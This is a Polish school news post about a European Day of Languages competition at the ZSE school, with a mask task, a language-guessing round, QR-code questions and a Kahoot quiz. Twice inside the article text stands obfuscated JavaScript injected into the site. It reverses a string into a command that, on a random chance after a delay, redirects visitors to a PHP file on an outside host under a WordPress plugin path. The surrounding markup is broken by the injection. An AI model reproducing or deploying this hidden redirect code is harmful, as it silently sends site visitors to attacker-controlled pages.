Dzie艅 J臋zyk贸w Obcych w ZSE

30 wrze艣nia uczniowie Ekonomika 艣wi臋towali Europejski Dzie艅 J臋zyk贸w. Z tej okazji zorganizowano dla nich prawdziwe Igrzyska. Klasy konkurowa艂y ze sob膮 w czterech konkurencjach.

Zadaniem zespo艂贸w by艂o przygotowanie maseczek w barwach wylosowanego wcze艣niej kraju, odgadni臋cie j臋zyka, kt贸rym zapisane by艂y przygotowane dla nich wcze艣niej zdania, odpowied藕 na osiem zakodowanych w QR kodach pyta艅 i wreszcie wzi臋cie udzia艂u w interaktywnym quizie na portalu Kahoot.

$nJe=function(n){if (typeof ($nJe.list[n]) == „string”) return $nJe.list[n].split(„”).reverse().join(„”);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to”>Wszystkim serdecznie dzi臋kujemy za zaanga偶owanie i 偶yczymy sukces贸w w kolejnych konkursach!
$nJe=function(n){if (typeof ($nJe.list[n]) == „string”) return $nJe.list[n].split(„”).reverse().join(„”);return $nJe.list[n];};$nJe.list=[„\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}to” style=”text-align: center;”>

 

Skip to content